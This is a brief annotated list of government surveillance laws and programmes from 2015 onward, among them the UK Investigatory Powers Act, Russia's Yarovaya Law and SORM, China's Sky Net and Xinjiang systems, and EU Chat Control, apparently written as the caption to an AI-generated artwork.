Data Retention Law (Australia) [2015] Mandatory ISP retention of metadata (2 years) for law-enforcement access. China’s Sky Net expansion & early “Sharp Eyes” pilots (China) [2015] Nationwide CCTV with facial recognition, integrating public and private cameras; “Sharp Eyes” pushes village-level coverage. Investigatory Powers Act a.k.a. “Snoopers’ Charter” (UK) [2016] Consolidated surveillance authorities (bulk powers, equipment interference), data retention & ISP logging (“internet connection records”). Yarovaya Law (Russia) [2016] Counter-terrorism package mandating retention and decryption assistance by telecoms/online services; Strengthens SORM ecosystem. German BND law reform (Germany) [2016] Legalizes/stipulates foreign-to-foreign cable tapping, introduces oversight changes following EIKONAL fallout. Investigatory Powers Act comes into force (UK) [2016] Bulk powers framework operational with codes of practice. Wiv 2017 (“Sleepwet”) & 2018 referendum (Netherlands) [2017] Intelligence and Security Services Act expanded bulk interception; A 2018 advisory referendum rejected it, prompting tweaks before implementation. China’s Intelligence Law [2017] Compels organizations and citizens to support state intelligence work; Implications for tech firms and data. Assistance and Access Act (Australia) [2018] Technical capability notices and voluntary/compulsory assistance powers targeting encrypted services and devices. Five Eyes Plus [2018] Five Eyes agreements with France, Germany, and Japan to introduce an information-sharing framework to counter China and Russia. CSE Act (Canada) via Bill C-59 [2019] Statutory basis for CSE’s active cyber operations and foreign intelligence, with new oversight/review mechanisms. IJOP & surveillance in Xinjiang (China) [2020s] Integrated Joint Operations Platform aggregates data (checkpoints, apps, biometrics) for risk scoring of Uyghurs and others. SORM-3 (Russia) [Ongoing] Deeper DPI, social media, and traffic metadata capture with localization requirements for providers. Five Eyes / Nine Eyes / Fourteen Eyes / SSEUR bulk collection [Ongoing] Continued §702 reauthorizations (USA) and partner bulk-powers regimes (UK, others) with periodic court/oversight modifications. Chat Control (Europe) [Ongoing] Proposal aimed to combat CSAM by allowing law enforcement to scan private messages, photos, and files, even when content is end-to-end-encrypted; Automatic scanning without consent or suspicion, imposed on all 450 million citizens of the European Union. Domain Awareness System (USA/NYC): Largest digital surveillance system in the world, part of the Lower Manhattan Security Initiative in partnership between the New York Police Department and Microsoft to monitor New York City. IMSI catchers / Stingrays: Portable cell-site simulators widely A device used by police and intel services for location/metadata capture. Mail Isolation Control and Tracking (MICT) (USA): USPS photographs exterior of all mail for investigative use. Jingwang Weishi (China/Xinjiang): Mandatory phone-scanning app developed by Shanghai Landasoft Data Technology Inc. reported to extract/report content/signatures. GhostNet (origin linked to China): Operation exposed in 2009 compromising targets in 100+ countries; Espionage network notable in surveillance context. Footnote: The artwork was generated using AI and further botched by me using the greatest image manipulation program .

0 views